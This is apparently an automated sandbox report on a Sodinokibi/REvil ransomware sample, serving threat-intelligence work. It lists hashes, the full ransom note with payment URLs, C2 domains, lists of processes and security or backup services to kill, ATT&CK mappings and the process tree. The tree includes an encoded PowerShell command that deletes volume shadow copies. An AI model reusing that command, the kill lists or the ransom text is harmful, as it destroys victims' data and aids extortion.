Analysis

  • max time kernel
    148s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 02:18

General

  • Target

    329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe

  • Size

    219KB

  • MD5

    23e2e231d941268aa54c5dbe465506e4

  • SHA1

    7d7508cebe74f05abe64f46fdd74c8f7a2130c53

  • SHA256

    329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915

  • SHA512

    fff902956992c68f2db01b5ed24802790834abae0aeb445e417144b54002887b8d132f083fd47239293fe858e239d1154f262e909ff8bba83ff0539f7a0d297d

Malware Config

Extracted

Path

C:\5o6053mhd0-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 5o6053mhd0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/59A1C23B4D7FB716 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/59A1C23B4D7FB716 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Q3bYyKsE0+rLwR3Zy0aeRpxmiRy+cjHefMG6xXLw1A3WGvSKYoXVWzIhgvsqVaZF am0IQx+j0LTEZg79UDC0W0t8mohnXOP+yS6ShuG1qrrveAeVCNC4ASk6UYIWYG/u y+51lyx7IaHo7h/OuEZ0IGis2zEwhX2/6Uvhc0vAhHbcmEC6SUGmHJG1QiS+RkxR 8MZTrmBiAvq6rigKYSeih1utsjU6Zo8DdX/CUa9xZ0LlZpjmCyJGJePikreDSI48 bjAYWcKpEfd24N6DR7NScouRktMQy4mOzcKuYDUDv+48YTAKO8ux50T4qAtzVZad UUt44cEz3tBuq7mDNRBz0iqFTa0c7fVAnY0H7QZ+r6vYcONl2aUByGlo0ox5NTFZ pCA6HZYpGcA9ulNPw61prxpDeZFkuVzx7VALEQhJ1ce2d5YPDx4Y3TonmvBJEnvp w0UGbrgzU4OJ6Y6yKk5olZPrwpnTRHsB/CPLwoQ5w/EhY9uv3LrHBDp+Cg0McxY2 wBBOXW+TcpqV1dKRqvttaod8muSRTyMujbq0slZdogvFdN6W7s/aNJmbaFzdmn8a 8aZ0hyxwnTeu0BIWE972DnSHD5r3sYSsOV5qqHEYCetshd398LilT6vab+NOHVnc lL8E8pE5geNIjDEVWQGDz8KQzR8/0ZcYwUFXyWSv7ssxWnqo96rTENsjZbGQ2fiP Sv1UKCF2SftE4naGc71ET8JzaWdl8aWiCx9iwoFtpmPfWKi3SpmXMoUrpBIvprXI hQlvyIm8WSWsjHm/fbXWgZTMKsv8jIaC050fRtZ0L1Se6V7CzQl6G/Iwh9/R3BDh ITgGyuMF/uPBc8CgX6f194f9bgE6Xpyvte+H3uhqqyLl3XWaT59GMzzUw8dgOUz2 ZfPCnk2vce3FDl66uvtbQedpAGy+33fAKDFMSdoaHVS0Ttf5OGb7vFt9dVbwKK67 Kw4+dG5mb9+hmz/7Qp0DIWgnz1ozEPY/tf3EjGZrYv10pp32elOBKEw0+Wz1OD7S eTEyu6tGBBPnLeqTUoBAn5cRVT4YMM1TkxjREbkC7zL+DgvYCrmP6z6W7uLqR73Y PmIzs78hoiVzgLEthzVdJnbEOTKul7TQovMN2oxcMKXtd19oxoI9dDVhOohqZnK/ mWFMHREPfCw= Extension name: 5o6053mhd0 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/59A1C23B4D7FB716

http://decryptor.top/59A1C23B4D7FB716

Extracted

Family

sodinokibi

Botnet

19

Campaign

35

C2

ufovidmag.com

daveystownhouse.com

profibersan.com

trivselsguide.dk

achetrabalhos.com

centuryvisionglobal.com

zaczytana.com

putzen-reinigen.com

maryairbnb.wordpress.com

ncn.nl

utilisacteur.fr

vdolg24.online

livelai.com

opticahubertruiz.com

brisbaneosteopathic.com.au

liepertgrafikweb.at

lifeinbreaths.com

ronielyn.com

ultimatelifesource.com

markseymourphotography.co.uk

Attributes
  • net

    true

  • pid

    19

  • prc

    infopath

    isqlplussvc

    mysqld_opt

    msftesql

    mydesktopservice

    sqbcoreservice

    ocautoupds

    ocssd

    mspub

    dbsnmp

    thunderbird

    mysqld

    oracle

    thebat

    sqlagent

    tbirdconfig

    mydesktopqos

    wordpad

    firefoxconfig

    winword

    onenote

    sqlwriter

    xfssvccon

    ocomm

    outlook

    synctime

    sqlbrowser

    visio

    mysqld_nt

    msaccess

    powerpnt

    encsvc

    steam

    thebat64

    excel

    dbeng50

    sqlservr

    agntsvc

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    35

  • svc

    backup

    memtas

    vss

    sophos

    sql

    mepocs

    svc$

    veeam

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi/Revil sample 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe
    "C:\Users\Admin\AppData\Local\Temp\329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Users\Admin\AppData\Local\Temp\3582-490\329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:964
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2012
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:988

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Change Default File Association

    1
    T1042

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe
      MD5

      8c1561ca54045cb6934c62711e16e6fe

      SHA1

      6708d111176432e753f3564b2ad7c0233408d739

      SHA256

      67a1130899695f2a2afa490ac62d6641c6bf0dc5dd3a63e786e806454214f36f

      SHA512

      58951d028c7c7acfe8f5c5936b625e2f49bda8455d25da9fd446bfa016b5501ea5d29de323d9dee179bcdc2dd75d9e1b78fd489c9b9fc965de35862535b883ca

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe
      MD5

      8c1561ca54045cb6934c62711e16e6fe

      SHA1

      6708d111176432e753f3564b2ad7c0233408d739

      SHA256

      67a1130899695f2a2afa490ac62d6641c6bf0dc5dd3a63e786e806454214f36f

      SHA512

      58951d028c7c7acfe8f5c5936b625e2f49bda8455d25da9fd446bfa016b5501ea5d29de323d9dee179bcdc2dd75d9e1b78fd489c9b9fc965de35862535b883ca

    • \Users\Admin\AppData\Local\Temp\3582-490\329c2d67530a45ae10a9f029079002e63b8d4b047ebfce81c089b36ad63b4915.exe
      MD5

      8c1561ca54045cb6934c62711e16e6fe

      SHA1

      6708d111176432e753f3564b2ad7c0233408d739

      SHA256

      67a1130899695f2a2afa490ac62d6641c6bf0dc5dd3a63e786e806454214f36f

      SHA512

      58951d028c7c7acfe8f5c5936b625e2f49bda8455d25da9fd446bfa016b5501ea5d29de323d9dee179bcdc2dd75d9e1b78fd489c9b9fc965de35862535b883ca

    • memory/964-59-0x000007FEFB8C1000-0x000007FEFB8C3000-memory.dmp
      Filesize

      8KB

    • memory/964-61-0x00000000023F0000-0x00000000023F2000-memory.dmp
      Filesize

      8KB

    • memory/964-62-0x00000000023F2000-0x00000000023F4000-memory.dmp
      Filesize

      8KB

    • memory/964-63-0x00000000023F4000-0x00000000023F7000-memory.dmp
      Filesize

      12KB

    • memory/964-60-0x000007FEF2B40000-0x000007FEF369D000-memory.dmp
      Filesize

      11.4MB

    • memory/964-64-0x00000000023FB000-0x000000000241A000-memory.dmp
      Filesize

      124KB

    • memory/1928-54-0x0000000076041000-0x0000000076043000-memory.dmp
      Filesize

      8KB